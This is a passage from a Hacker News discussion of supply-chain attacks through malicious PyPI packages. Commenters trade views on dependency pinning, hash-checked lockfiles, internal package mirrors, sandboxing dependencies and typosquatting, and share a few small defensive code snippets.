| stuff, your team will tend to build on/build around the
| functionality of the old version.
|
| That leads to some real fun come upgrade time. If, you're,
| say, 3 major versions behind the latest version, or whatever
| version you want to upgrade to that contains some Cool New
| Feature(tm) you really, really _need_ , you might end up
| having to do this silly dance of upgrading major versions one
| at a time, in order to keep the complexity of the upgrade
| process as a whole under control.
|
| Oh, and, sometimes things get deprecated. That's always fun
| to deal with.
|
| So, TL;DR: Yes, pin versions! It's safer that way! Just be
| aware that, like most engineering decisions, there's a
| tradeoff here that saves you some pain now in exchange for
| some amount of a different kind of pain in the future.
| wiremine wrote:
| Feels like this is a business opportunity for someone.
|
| Use case:
|
| 1. Upload a pre-reviewed package.json file.
|
| 2. The service monitors changes and recommends updates.
| Recommendations might include security, bug fixes, features,
| etc. It would check downstream dependencies, too. For
| production systems, the team might only care about security
| fixes.
|
| 3. The developer team can review the recommendations and
| download the new package.json.
|
| (There are lots of opportunities to improve this: direct
| integration with git, etc.)
|
| Anybody know if this sort of service exists? I know npm has
| _some_ of this. Maybe I'm just ignorant of how much of a
| solved problem this is?
| goodpoint wrote:
| > Feels like this is a business opportunity for someone.
|
| This is what some Linux distributions do. Quality review,
| legal review, security backports.
| cilefen wrote:
| We use Renovate for this.
| rank0 wrote:
| What you're looking for is called SCA (software composition
| analysis).
|
| Best tool I've used so far in this domain is snyk.
| Macha wrote:
| Backwards compatibility in the javascript world isn't great.
| If you stop updating for a couple of years, half your
| libraries have incompatible API changes. Then something like
| a node or UI framework update comes along and makes you
| update them all at once to work on the new version, and
| you're rewriting half your application just to move to a non-
| vulnerable version of your core dependency.
| oblio wrote:
| Java/Spring/Maven should have locked down dependencies by
| default. They have to go out of their way to not do that. Not
| that some people don't, anyway.
|
| Typos:
|
| > I stopped advocating for locking everything down.
|
| started?
|
| > Look down dependencies.
|
| lock?
| watermelon0 wrote:
| AFAIK Maven and Gradle don't have any built-in way of
| locking down dependencies (direct or transitive), unless I
| missed something.
| cesarb wrote:
| In my experience, Maven always uses the exact version
| specified in your pom.xml (and the pom.xml of your
| dependencies, transitively), it never uses a newer
| version automatically. That is, the built-in way in Maven
| _is_ locked down dependencies.
| specialist wrote:
| Edited. Thanks for proofreading my rant. :)
| nvrspyx wrote:
| I think the first typo is actually correct. They're saying
| that they stopped advocating for it because everyone
| treated them like they were crazy for doing so.
| fnord77 wrote:
| on the other hand, if you don't keep your packages up to
| date, you can get so behind that it is nearly impossible to
| upgrade.
|
| especially bad if the older version you are on turns out to
| have vulns.
|
| Josh Bloch says to update your packages frequently and I
| agree.
| paulddraper wrote:
| For quite a while now, the JS ecosystem has used lock files
| -- npm, yarn, pnpm. You have to go out of your way not to
| pin JS dependencies.
| dec0dedab0de wrote:
| node locks down dependencies for you, not only the version,
| but it saves a hash too. The problem is that npm install will
| install the newest version allowed in your config, and re-
| lock it. However, if you run npm ci, it will only install what
| is locked, and fail if the hashes don't match.
|
| in python pipenv works the same way, pipenv sync will only
| install what is locked, and will check your hashes. I'm not
| sure about poetry.
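A rough model of the guarantee `npm ci` and `pipenv sync` provide (hypothetical helper; plain dicts stand in for the lockfile and the registry):

```python
import hashlib

def ci_install(lockfile, registry):
    """Install exactly the locked versions, refusing any artifact whose
    bytes no longer match the hash recorded at lock time -- roughly
    what `npm ci` and `pipenv sync` enforce."""
    installed = {}
    for name, (version, digest) in lockfile.items():
        data = registry[(name, version)]
        if hashlib.sha256(data).hexdigest() != digest:
            raise RuntimeError(f"hash mismatch for {name}=={version}")
        installed[name] = version
    return installed

good = b"original release"
lock = {"requests": ("2.26.0", hashlib.sha256(good).hexdigest())}
assert ci_install(lock, {("requests", "2.26.0"): good}) == {"requests": "2.26.0"}

# A silently re-uploaded artifact fails the install instead of sneaking in.
tampering_caught = False
try:
    ci_install(lock, {("requests", "2.26.0"): b"tampered release"})
except RuntimeError:
    tampering_caught = True
assert tampering_caught
```

Version pinning alone only fixes the name and number; it is the recorded hash that makes a swapped-out artifact fail loudly.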
| rtpg wrote:
| I mean you can have reproducible builds while being on the
| upgrade train. `package-lock.json` exists for a reason. And
| the tiny pains of upgrading packages over time mean that then
| you don't have to deal with gargantuan leaps when that one
| package has the thing you want and it requires updating 10
| other packages because of dependencies.
|
| Node is a special horror because of absolute garbage like
| babel splitting itself into 100s of plugins and slowly
| killing the earth through useless HTTP requests instead of
| just packaging a single thing (also Jon Schlinkert wanting to
| up his package download counts by making a billion useless
| micropackages). But hey, you're choosing to use those
| packages.
|
| I think if you're using them, good to stay up to date. But
| you can always roll your own thing or just stay pinned. Just
| that stuff is still evolving in the JS world (since people
| still aren't super satisfied with the tooling). But more
| mature stuff is probably fine to stick to forever.
| Nursie wrote:
| > keeping packages up to date.
|
| It's good security practice, especially for anything internet
| facing.
|
| Sure, you don't have to do it obsessively, but if you let it
| stagnate you can have trouble updating things when critical
| vulnerabilities are found, and you have a huge job because
| multiple APIs have changed along the way.
| pjmlp wrote:
| I have been doing internal repositories and vendoring since
| 2000, only for personal projects do I do otherwise as they are
| mostly throw away stuff.
|
| Teaching good security practices and application lifecycle
| management seems to always be an uphill battle.
| yjftsjthsd-h wrote:
| Sorry, I don't quite see how this would protect against supply
| chain attacks. If an upstream dependency is back-doored, they
| just have to silently add their code in an otherwise reasonable
| sounding release, and now you will happily download that
| version, add it to your internal mirrors, and pin its version
| forever. Unless you actually read the diff on every update,
| which I think is impractical (although you're welcome to
| correct me), I don't see how this is buying you much.
| ozzythecat wrote:
| It's not 100% bullet proof, but it's safer than pulling any
| random repos directly from the internet.
|
| It's also good that your business doesn't have to rely on a
| third party every time you need to pull down your
| dependencies and build your software.
| DSingularity wrote:
| Protects you against a dependency being hijacked and
| retroactively embedding malware in prior versions.
| Checksumming would protect against that without the trouble of
| manually hosting the dependency.
| polynomial wrote:
| My read was GP is implying they _do_ read the diff every
| time, and only change the pinned version after a manual
| review- "only after we are happy."
|
| This does seem impractical at even a modest scale.
| yardstick wrote:
| We periodically review all dependencies change logs,
| security advisories etc and update based on risk review. We
| also keep an eye out for critical vulnerabilities that need
| immediate patching. There are tools to help with this, plus
| communities like HN are relevant for breaking news.
| zerkten wrote:
| What does "modest scale" mean? Some people have to have all
| dependency updates reviewed and have some level of
| independent security team monitoring dependency changes.
| Not everyone has this, but the context is key as some
| domains have this consistently.
|
| Some of this is cultural in addition to being paranoid
| about security, or having strict compliance requirements.
| For your average startup, they may not have any time to
| dedicate to this and other fires, but that's not a
| universal situation.
| staticassertion wrote:
| > What does "modest scale" mean? Some people have to have
| all dependency updates reviewed and have some level of
| independent security team monitoring dependency changes.
|
| Who? Seems totally intractable to me.
| cortesoft wrote:
| I think part of the idea is that if you only use versions
| that have been released for a little while, you are hoping
| SOMEONE notices the malicious code before you finally update.
|
| There are a number of issues with this approach, although the
| practice still might be a net benefit.
|
| One, you are going to be behind on security patches. You have
| to figure out, are you more at risk from running unpatched
| code for longer, or from someone compromising an upstream
| package?
|
| Two, if too many people use this approach, there won't be
| anyone who is actually looking at the code. Everyone assumes
| someone else would have looked, so no one looks.
| helsinki wrote:
| FYI - You can overwrite an existing package's release/version
| via pip (at least when using Artifactory's PyPI). Not safe to
| assume pinning the version 'freezes' anything.
| nerdponx wrote:
| Make a "lockfile" with the pip-compile tool [0] that includes
| hashes. Unless you happen to fetch the hash after the package
| has been compromised, this should keep you safe from an
| overwritten version.
|
| [0]: https://pypi.org/project/pip-tools/
| oefrha wrote:
| No, you cannot overwrite a file on PyPI once uploaded, even
| if you delete the release first. This policy has been in
| place for many years.
| globular-toast wrote:
| Pip also supports packages hashes so you can be sure you're
| getting the exact same package that you got last time.
| [deleted]
| Nursie wrote:
| This is how it always used to be, back in the before[1] times.
| Libraries would be selected carefully and dependencies would be
| kept locally so that you could always reproduce a build.
|
| The world is different now, and just being able to select a
| package and integrate it like _that_ is a massive effectiveness
| multiplier, but I think the industry at large lost something in
| the transition.
|
| ([1] before internet package management, and before even stuff
| like apt and yum)
| goodpoint wrote:
| > I think the industry at large lost something in the
| transition.
|
| Lost a lot of trust and security with the advent of language-
| specific installers that pull libraries and their
| dependencies from random URLs without any 3rd party vetting.
| mikepurvis wrote:
| I agree, though I think there are a couple pieces to the
| puzzle. Like, quite apart from the enormous convenience of
| new releases being available right away, and even being
| able to drop in a git URL and run your dependency off a
| branch while you wait for your upstream PR to merge, pip
| provides isolation between workspaces that apt has never
| been able to do natively because it's too generic-- the
| closest thing is lightweight unshares, but those were years
| after virtualenv, require more ceremony to get going with,
| and may be isolated from the outside system in ways that
| impede productivity (there's also never _really_ been a
| consistent tooling story for it, with having to cobble
| together debootstrap + whatever the chroot flavor of the
| week is).
|
| But the biggest issue is when npm, cargo, etc showed how to
| include a dependency multiple times at different versions.
| Operating system package managers (other than Nix &
| friends) have no concept for how this could or would work.
| Pip has no story for it, and the various pip-to-apt bridges
| like py2deb and stdeb if anything just exacerbate the
| problem, by mixing your project's dependencies with those
| on your system.
|
| Anyway, yes. Things were lost, 100%. But I don't think the
| system you want (isolation, version freedom, but with
| safe/vetted packages) is going to be something that's
| possible to evolve out of any of the current systems. It's
| got to be something that goes back to first principles.
| goodpoint wrote:
| > pip provides isolation between workspaces that apt has
| never been able to do natively because it's too generic
|
| This is hardly a concern on production systems. It's been
| common practice for decades to deploy each service on a
| dedicated host, or at least a VM in order to have a
| degree of security isolation. [or a container if you
| don't care]
|
| > npm, cargo, etc showed how to include a dependency
| multiple times at different versions
|
| And this is why they cannot provide stable releases and
| security backports.
|
| If you want security updates you can use Debian or pay $$
| for SuSE or Red Hat or $$$$ for custom support from some
| tech companies, but they will mostly support one version
| per package.
|
| The combinatorics explosion of packages _times_ versions
| on archives like npm or pypi makes it prohibitively
| expensive to reliably patch and test every combination of
| packages and versions.
|
| Debian has been pioneering reproducible builds and
| automated installation CI/QA and it still took a lot of
| effort to get there.
|
| > I don't think the system you want (isolation, version
| freedom, but with safe/vetted packages) is going to be
| something that's possible to evolve out of any of the
| current systems.
|
| I don't want version freedom: it's not attainable. It's
| not a software problem, it's a math problem.
|
| > It's got to be something that goes back to first
| principles.
|
| Any idea?
| mikepurvis wrote:
| If you don't want or need version freedom, what is it
| about the existing deb/rpm ecosystems that don't work for
| you, either on their own or in conjunction with the
| various tools that bridge other ecosystems into them?
| (I'm a fan of dh_virtualenv, myself)
|
| Or is your lament that the world as a whole is worse off
| because others have eaten of the fruit of systems like
| npm and pip?
| goodpoint wrote:
| The latter, albeit it's not "the world as a whole", but
| some tech bubble. Various large companies prohibit
| pip/npm/docker.
|
| (and here I'm even getting downvoted for going against
| the hivemind)
|
| I can only hope that after enough software supply chain
| attacks the industry will realize that distros were right
| all along.
| _tom_ wrote:
| The problem is that it also is a vulnerability multiplier.
|
| People used to understand every package the installed. Now,
| they install dependencies of dependencies of dependencies, to
| the point that they have not even SEEN the name of most of
| their dependencies.
|
| Install anything with maven and count the number of packages
| installed. It is appalling.
| pornel wrote:
| Own hosting, pinning, and checksum checks are defenses against
| network-based attacks and compromise of the package repository.
|
| They do nothing against trojans like these. You will be running
| your own pinned checksummed version of the malicious code.
|
| If you want to stop malware published by the legitimate package
| author, you need to review the code you're pulling in and/or
| tightly sandbox it (and effective sandboxing is usually
| impossible for dependencies running in your own process).
| actually_a_dog wrote:
| Depending what you mean by "review," then I agree with you.
|
| If you mean having humans inspect every line of code of every
| package, well... good luck with that. But, if you're talking
| about automated analysis and acceptance testing, then, I
| think you've got something.
|
| Like unit testing, automated testing and analysis is never
| going to catch 100% of all issues, but it can definitely help
| your SRE team sleep at night.
| dec0dedab0de wrote:
| it does protect against typosquatted dependencies. So if there was
| an evil package called requestss then you wouldn't be able to
| install it by accident.
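A toy version of the kind of check that catches such look-alike names, a plain Levenshtein distance against a list of well-known packages (hypothetical helper, not part of pip):

```python
def edit_distance(a, b):
    """Levenshtein distance via the classic dynamic program."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]

POPULAR = {"requests", "urllib3", "numpy"}

def looks_typosquatted(name):
    """Flag names one edit away from a well-known package (but not
    the well-known package itself)."""
    return name not in POPULAR and any(
        edit_distance(name, p) == 1 for p in POPULAR)

assert looks_typosquatted("requestss")       # one extra 's'
assert not looks_typosquatted("requests")    # the real thing
assert not looks_typosquatted("flask")       # unrelated name
```

An internal mirror makes this check unnecessary for builds, since only explicitly mirrored names are installable at all; the sketch is closer to what a registry-side or pre-commit scan might do.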
| tremon wrote:
| Well, it does introduce a time delay between the upstream release
| of a compromised package and when it enters your own codebase.
| As long as the exploit is found and published before someone
| manually uploads it to the local store, you're safe.
|
| But yes, a better option would be to run your own acceptance
| tests on each new upstream release, and that includes
| profiling disk/network/cpu usage across different releases.
| jameshart wrote:
| Also introduces that same time delay for getting security
| patches released by package maintainers into your build
| pipeline.
| tracker1 wrote:
| This... worked in an org, where it literally took nearly
| 3 months to get package updates and additions approved...
| and that was for licensing review, not even proper
| security audits.
|
| It may be safer to just accept that you live in the wild
| west and have systems boundaries in place to limit
| exposure/impact.
|
| I've been pushing for closed-box logging targets, for
| example, where all logging goes to at _least_ two systems
| (local and remote) so that the logging target is
| generally only available to submit log entries to.
| Not perfect, but where my head has been at.
|
| Another thing is to _PULL_ backups, not push them out.
| jacquesm wrote:
| > Another thing is to PULL backups, not push them out.
|
| That's an absolute must. A push backup may not be a
| backup at all when you need it, or it may be compromised.
| It also requires the system you push into to be
| accessible for inbound connections, which in itself may
| be problematic.
| beefjerkins wrote:
| I'm trying to wrap my head around the concept of
| 'pulling' backups, rather than pushing them. In my mind,
| once you make a backup, you should then transfer it to a
| separate system for archival.
|
| Where am I going wrong?
| jjnoakes wrote:
| To pull backups, the backup system connects to the
| production system and grabs the data, storing it locally
| on the backup system. To push backups would be for the
| production system to connect to the backup system and
| send the data.
|
| The main benefit of pull-based backups is that the
| production machine doesn't need credentials to write to
| the backup server; this means if production is
| compromised, it can't corrupt your backups.
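The credential asymmetry can be illustrated with a toy model (hypothetical classes; a real setup would be e.g. rsync over SSH initiated from the backup host):

```python
class Host:
    """A machine with a local filesystem, modeled as a dict."""
    def __init__(self):
        self.files = {}

def pull_backup(backup_host, prod_host):
    """Pull model: the backup host initiates, reading production and
    writing locally. Production never holds a handle (credentials)
    to the backup store."""
    backup_host.files.update(dict(prod_host.files))

prod, backup = Host(), Host()
prod.files["db.dump"] = "good data"
pull_backup(backup, prod)

# An attacker who fully controls prod can corrupt prod's copy...
prod.files["db.dump"] = "ransomware"
# ...but has no reference to `backup`, so yesterday's archive survives.
assert backup.files["db.dump"] == "good data"
```

In a push model the arrow is reversed: prod would need write credentials to the backup store, and those credentials are exactly what an attacker on prod would use to destroy the archives.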
| yardstick wrote:
| Not true. We assess each update in case of high priority
| issues that need a quick update.
|
| Also we are cautious of using dependencies that don't
| provide long term support/back fixes - where possible I
| pick stable, responsibly-managed dependencies. Postgres
| is a great example, security fixes are applied across
| multiple major versions, not just the latest.
| rexelhoff wrote:
| Sounds exactly like what we do for medical device
| software.
|
| Version pinning, self-managed forks and code reviews of
| the dependency on upgrade.
| geofft wrote:
| How do you get informed about whether a high-priority
| issue exists?
|
| In particular, who is auditing the old version of the
| code that you happen to be running to make sure it
| doesn't have vulnerabilities that are now gone after a
| non-security-motivated change like a refactoring or a
| feature removal? Probably not the upstream maintainers,
| who generally only maintain HEAD.
| neves wrote:
| And you should run an antivirus in the repository machine.
| It will be really slow, but will eventually catch these
| malicious libs.
| stjohnswarts wrote:
| You will never eliminate the threat entirely, pinning and not
| using obscure projects does however cut down on the
| probability and you can't deny that.
| ericpauley wrote:
| Out of curiosity, is it really necessary to have the separate
| artifact server? Pinning dependencies by hash ought to be
| sufficient.
| fortran77 wrote:
| It's nice to have a build machine that can complete a build
| when it's disconnected from the Internet
| kawsper wrote:
| How often does that happen?
| ex_amazon_sde wrote:
| It's standard practice in many large companies.
| 83457 wrote:
| Sometimes I use an air gapped test lab. Setup of certain
| software and projects is a real pain. Sounds like this
| approach could help.
| oauea wrote:
| https://hn.algolia.com/?q=cloudflare+down
|
| https://hn.algolia.com/?q=akamai+down
|
| https://hn.algolia.com/?q=github+down
| jrockway wrote:
| Docker Hub also has rate limits and outages, so yet
| another thing you want to cache if you promise customers
| "we'll install our software in your Kubernetes cluster in
| 15 minutes 99.95% of the time".
| jrockway wrote:
| Security and availability don't have to be mutually
| exclusive. I remember in the early days of Go modules our
| Docker builds (that did "go mod download") would be rate-
| limited by Github, so a local cache was necessary to get
| builds to succeed 100% of the time. (Yes, you can plumb
| through some authentication material to avoid this, but
| Github is slow even when they're not rate limiting you!)
| Honestly, that thing was faster than the official Go Module
| Proxy so I kept it around longer than necessary and the
| results were good.
|
| Even if you cache modules on your own infrastructure, you
| should still validate the checksums to prevent insiders from
| tampering with the cached modules.
|
| I'll also mention that any speed increases really depend on
| your CI provider. I self-hosted Jenkins on a Rather Large AWS
| machine, and had the proxy nearby, so it was fast. But if you
| use a CI provider, they tend to be severely network-limited
| at the node level and so even if you have a cache nearby, you
| are still going to download at dialup speeds. (I use CircleCI
| now and at one point cached our node_modules. It was as slow
| as just getting them from NPM. And like, really slow... often
| 2 minutes to download, whereas on my consumer Internet
| connection it's on the order of 10 seconds. Shared
| resources... always a disaster.)
| helsinki wrote:
| Tangential non sequitur:
|
| > self-hosted on AWS
|
| People forgot what self-hosting actually means.
| jrockway wrote:
| I disagree with that analysis. That basically means
| running some binary yourself, with the alternative being
| buying a SaaS product that is hosted by the developer.
| You may think that "self-hosting" means having your own
| physical server, but I have never heard anyone else use
| the expression like that.
| paulryanrogers wrote:
| Meanings can evolve over time. I tend to think of self
| hosted as installing from code and managing myself,
| whether on local hardware or remote.
| jijji wrote:
| The OP wrote "self-hosted Jenkins", which has a different
| meaning
| yardstick wrote:
| Seems reasonable enough depending on your use case.
|
| In our situation we store our own (private, commercial)
| artifacts as well as third party ones, so we already need to
| have a server, and we know our server is configured,
| maintained & monitored in a secure fashion whereas I have no
| guarantees with public servers.
|
| Plus our build servers don't have access out to the internet
| either, for security. Supply chain attacks like SolarWinds
| and Kaseya are too common these days.
|
| Edit: Also, our local servers are faster at serving requests,
| allowing for faster builds, and ensures no issues with broken
| builds if a public repo went offline or was under attack.
| tikkabhuna wrote:
| We use an artifact server and our build servers are
| completely airgapped. We know exactly what dependencies are
| used across the organisation. We can take centralised action
| against malicious dependencies.
|
| I wouldn't bother having one if you're small (<25) people. If
| you start having a centralised Infosec group, then it starts
| to become necessary.
| njharman wrote:
| Airgapped? Really? Every time a build happens, someone
| physically moves a thumb drive or some other media to/from
| the build server?
|
| Airgap means not networked, even internally. Not just
| "blocked" from internet.
| tikkabhuna wrote:
| Wikipedia[1] offers a slightly relaxed definition,
| although I agree, I (and my colleagues) abuse the term.
|
| The artifact repository server connects to the internet
| via a proxy. Build servers have no access to the
| internet.
|
| [1] https://en.wikipedia.org/wiki/Air_gap_(networking)
| zerkten wrote:
| It's going to depend on your circumstances. You don't share
| any context about your app or any of your development. Rather
| than looking at this from the perspective of needing an
| artifact server, you just look at it as a case of supply
| chain protection.
|
| If pinning dependencies counters all the threats in your
| threat model, then fine. If not, you need to be doing
| something to counter them. An artifact server, or vendoring
| your dependencies, provides a lot of additional
| control where chokepoints or additional audits can be
| inserted.
|
| If there was no management cost or hassle then you'd just
| have an artifact server to give you a free abstraction, but
| it's a trade-off for many people. It's also not a solution in
| itself, you need to be able to do audits and use the artifact
| server to your advantage.
|
| The problem is really with the threat models and whether
| someone really knows what they need to defend against. I find
| that many engineers are naive to the threats since they've
| never personally had exposure to an environment where these
| are made visible and countered. At other times, engineers are
| aware, but it's a problem of influencing management.
| formerly_proven wrote:
| Depending on what you're using for package management, an
| "artifact server" can be as simple as a directory in git or a
| dumb HTTP server. File names are non-colliding and you don't
| really need an audit log on that server, because all
| references are through lock-files in git with hashes (right?
| RIGHT?), so it basically doesn't matter what's on there.
| actually_a_dog wrote:
| Yep. You should also be hosting and deploying from wheels[0],
| even for stuff you create internally. If you're doing it right,
| you'll end up hosting your own internal PyPI server[1], which,
| luckily, isn't hard[2].
|
| We did this at one of my previous companies, and, of all the
| things that ever went wrong with our deploy processes, our
| internal PyPI server was literally _never_ the culprit.
|
| ---
|
| [0]: https://pythonwheels.com/
|
| [1]: https://github.com/testdrivenio/private-pypi
|
| [2]: https://testdriven.io/blog/private-pypi/
| grincho wrote:
| Yes, this is why I implemented hash-checking in pip
| (https://pip.pypa.io/en/stable/topics/repeatable-
| installs/#ha...). Running your own server is certainly another
| way to solve the problem (and lets you work offline), but
| keeping the pinning info in version control gives you a built-
| in audit trail, code reviews, and one fewer server to maintain.
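
For reference, pip's hash-checking mode looks roughly like this in
a requirements file (the digests below are placeholders, not real
hashes); installing with `pip install --require-hashes -r
requirements.txt` then refuses anything unpinned or mismatched:

```
# requirements.txt - every requirement pinned to version and hash
flask==2.0.1 \
    --hash=sha256:<digest-of-the-published-wheel> \
    --hash=sha256:<digest-of-the-published-sdist>
```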
| stavros wrote:
| Doesn't Poetry do this by default in its lockfile too?
| c618b9b695c4 wrote:
| There is an active PEP[0] for defining lockfiles.
|
| 0: https://www.python.org/dev/peps/pep-0665/
| ageofwant wrote:
| You should mention this in your interviews. Keeping up to date
| with the state of the art is implicit for me. If I need to
| spend months retraining or upskilling because of company
| policy, I expect to be compensated for that while employed.
| yardstick wrote:
| We are upfront about it in interviews. We definitely don't
| want unhappy developers, but we also don't want insecure
| code. We do upgrade libraries but we do so only after
| analysing risk and impact. None of our developers have spent
| months training to develop our code.
| HALtheWise wrote:
| It seems to me like one low-hanging fruit that would make a
| lot of these kinds of exploits significantly more difficult
| is language-level control over which libraries are allowed to
| make outgoing HTTP requests or access the file system. It
| would be great if I
| could mark in my requirements.txt that a specific dependency
| should not be allowed to access the file system or network, and
| have that transitively apply to everything it calls or eval()'s.
| Of course, it would still be possible to make malware that
| exfiltrates data through other channels, but it would be a lot
| harder.
|
| I am not aware of any languages or ecosystems that do this, so
| maybe there's some reason this won't work that I'm not thinking
| of.
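
Python can't express this per-dependency, but PEP 578 audit hooks
(Python 3.8+) give a coarse, process-wide approximation. A sketch -
note this is observability tooling, not a hardened sandbox, and
genuinely malicious code can work around it:

```python
import sys

def deny_network(event, args):
    # Abort any socket connection attempt, process-wide.
    # (Per-package attribution would require inspecting the call stack.)
    if event == "socket.connect":
        raise RuntimeError(f"network access blocked: {args}")

sys.addaudithook(deny_network)

import socket

try:
    socket.socket().connect(("203.0.113.1", 80))  # TEST-NET address
except RuntimeError as exc:
    print("blocked:", exc)
```

The hook fires before the OS-level connect, so the attempt is
refused without any traffic leaving the machine.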
| delosrogers wrote:
| If I'm not mistaken I think that some languages with managed
| effects allow you to do this through types. For example, in Elm
| HTTP requests have the type Cmd Msg, and the only way to
| actually execute the IO is to pass that Cmd Msg to the
| runtime through the update function. This means you can
| easily get visibility, enforced by the type system, into what
| your dependencies do and restrict dependencies from making http
| requests or doing other effects.
| dhosek wrote:
| I've been thinking about this a lot as I consider the scripting
| language for finl [1]. I had considered an embedded Python, but
| ended up deciding it was too much of a security risk, since,
| without writing my own python interpreter (something I don't
| want to do), sandboxing seems to be impossible. Deno is a
| real possibility, or else forking Boa, which is a pure Rust
| implementation of JS.
|
| 1. One thing I absolutely do _not_ want to do is replicate the
| unholy mess that's the TeX macro system. There will be simple
| macro definitions possible, but I don't plan on making them
| Turing complete or having the complex expansion rules of TeX.
| landonxjames wrote:
| Deno (a Node-like runtime by the original author of Node) has a
| security model kind of like this [0]. It's unfortunately not
| as granular as I think it should be (it only operates on the
| module level, not on individual dependencies), but it's a
| start.
|
| [0] https://deno.land/manual/getting_started/permissions
| bredren wrote:
| Ryan Dahl (the above-mentioned creator of Deno) gave his
| second podcast interview ever this spring; it went live June
| 8th [1].
|
| It covers a lot of terrain including the connectivity
| permissions control.
|
| I recommend it as an easy way to learn about Deno and how it
| is different from Node as it is today.
|
| Node seems to have evolved to handle some of what Deno set
| out to do at the start. It is worth hearing from Dahl why
| Deno is still relevant and for what use cases.
|
| Dahl speaks without ego and addresses interesting topics like
| the company built around Deno and monetization plans.
|
| [1] https://changelog.com/podcast/443
| hortense wrote:
| This can be done with a capability-based operating system,
| though
| it requires running the libraries you want to isolate in a
| separate process.
|
| On a capability-based OS you whitelist the things a given
| process can do. For instance, you can give a process the
| capability to read a given directory and write to a different
| directory, or give the capability to send http traffic to a
| specific URL. If you don't explicitly give those capabilities,
| the process can't do anything.
| parhamn wrote:
| I was wondering earlier how useful deno's all-or-nothing
| policies would actually be in the real world. It seems like
| rules like this (no dep network requests, intranet only, only
| these ips) are much more useful than "never talk to the web".
|
| For Python this probably won't ever be possible, given the
| way the import system works and the patching packages can do.
| tadfisher wrote:
| Portmod[0] is a package manager for game modifications
| (currently Morrowind and Doom), and it runs sandboxed Python
| scripts to install individual packages. So I think this is
| possible, but it's not a built-in feature of the runtime as
| is the case for deno.
|
| [0]: https://gitlab.com/portmod/portmod
| helsinki wrote:
| This is a great idea, but I'm not sure how it could be
| implemented without cgroups, which are a pain, especially when
| you don't have root access.
| cesarb wrote:
| What you want sounds like the way Java sandboxing worked
| (commonly seen with Java applets). The privileged classes which
| do the lower-level operations (outgoing network requests,
| filesystem access, and so on) ask the Java security code to
| check whether the calling code has permission to do these
| operations, and that Java security code throws an exception
| when they're not allowed.
| geofft wrote:
| Yes, and also, this is an extraordinarily complex design to
| implement and get right. Java more or less failed in contexts
| where it was expected to actually enforce those boundaries
| reliably - untrusted applets on the web. It's working great
| in cases where the entire Java runtime and all libraries are
| at the same trust level and sandboxing/access control
| measures, if any, are applied outside the whole process - web
| servers, unsandboxed desktop applications like Bazel or
| Minecraft, Android applications, etc. Security
| vulnerabilities in Java-for-running-untrusted-applets
| happened all the time; security vulnerabilities that require
| you to update the JRE on your backend web servers are much
| rarer.
|
| If you make a security boundary, people are going to rely on
| it / trust it, and if people rely on it, attackers are going
| to attack it for real. Making attacks _harder_ isn't enough;
| some attacker will just figure it out, because there's an
| incentive for them to do so. It is often safer in practice
| not to set up the boundary at all so that people don't rely
| on it.
| staticassertion wrote:
| I started building this at one point. Basically there's an
| accompanying manifest.toml that specifies permissions for the
| packages with their checksums, and then it can traverse the
| dependency graph finding each manifest.toml.
|
| It also generated a manifest.lock so if manifests changed you
| would know about it.
|
| Then once it built up the sandbox it would execute the build.
| If no dependencies require networking, for example, it gets no
| networking, etc.
|
| I stopped working on it because I didn't have time, and it
| obviously relied on everyone doing the work of writing a
| manifest.toml and using my tool, plus it only supported Rust
| and crates.io.
|
| TBH it seems really easy to solve this problem; it's well-
| worn territory - browser extensions have been doing the same
| thing for decades. Similarly, why can I upload a package with
| a
| near-0 string distance to another package? That'd help a
| massive amount against typosquatting.
|
| I guess no one who implements package managers wants to
| implement it.
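
The string-distance idea is cheap to prototype - a sketch using
difflib from the standard library (the package list and cutoff are
made-up values a real registry would have to tune):

```python
import difflib

# Hypothetical list of popular package names a registry would protect.
POPULAR = ["requests", "numpy", "pandas", "urllib3"]

def looks_like_typosquat(candidate: str, known=POPULAR, cutoff: float = 0.85) -> bool:
    """Flag a new package name suspiciously close to a known one."""
    if candidate in known:
        return False  # it *is* the known package, not a squat
    return bool(difflib.get_close_matches(candidate, known, n=1, cutoff=cutoff))
```

A registry could run this at upload time and route near-misses to
manual review rather than rejecting them outright.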
| peanut_worm wrote:
| I am surprised this doesn't happen to NPM all the time
| otagekki wrote:
| It does: https://www.zdnet.com/google-amp/article/malicious-
| npm-packa...
| toxik wrote:
| How do you know it doesn't?
| LambdaTrain wrote:
| On Windows 10, if I want to view the plaintext of a stored
| password in Chrome, the password of the currently logged-in
| Windows user is required. So is the password stored
| encrypted? Just wondering if the same is done for CC
| information, and if such a practice is effective against
| malware stealing it.
| soheil wrote:
| Can trusted PyPI packages or other language packages be taken
| over? Can their once-benevolent author turn malicious and
| inject code and push a minor version after they wake up one
| day?
| mm983 wrote:
| There once was an adblocker called Nano which was open source
| and quite popular. The developer sold the ownership, and the
| new owners injected malware, which was then shipped to all
| Chrome users with the extension.
|
| So I don't see why the same shouldn't work for PyPI packages,
| and I also don't understand why no one saw this coming. With
| how many companies have adopted Python, there surely will be
| a security vendor willing to provide free package screening
| for the repo.
| ageofwant wrote:
| Interesting that all the noted examples assume a Windows
| host. I like that; people that use Windows deserve the drama
| they get ;-)
| outworlder wrote:
| Sometimes they don't get a choice. Especially in a corporate
| environment.
| speedgoose wrote:
| I've been using GitHub Codespaces for a few months and I'm
| wondering whether developing in such a remote sandbox is an
| improvement for security. I feel like it would prevent a
| Python or npm package from stealing my cookies and credit
| card numbers.
| AtlasBarfed wrote:
| Oh look, an advertisement.
|
| Also, thank you for causing mass disruption in javaland by
| shutting down your repos on pretty short notice.
|
| Artifactory may be a good piece of software with a good
| purpose, not least of which is the public repository security
| problem, but every company I have been at has used it as a
| hammer to stifle use of open source and create a "lords of
| data" style fiefdom in the company with tons of procedures.
| legrande wrote:
| > The second payload of the noblesse family is an "Autocomplete"
| information stealer. All modern browsers support saving passwords
| and credit card information for the user:
|
| > Browser support for saving passwords and credit card
| information
|
| > This is very convenient, but the downside is that this
| information can be leaked by malicious software that got access
| to the local machine.
|
| I never store CC deets anywhere, not even in a secure password
| manager vault. I typically manually type it out from the card, as
| I rarely use a CC (every month or so). I can see why
| automatically filling in CC info would be useful for people who
| use their CC _a lot_.
|
| If I was using it a lot, I would use a non-browser password
| manager however, since browser secrets can be exfil'd via various
| means and I trust a non-browser password manager vault more.
| DannyBee wrote:
| In the US, CC holders have, by law, almost no liability for
| fraud - it's
| capped at 50 bucks, and is 0 bucks if you report it before it
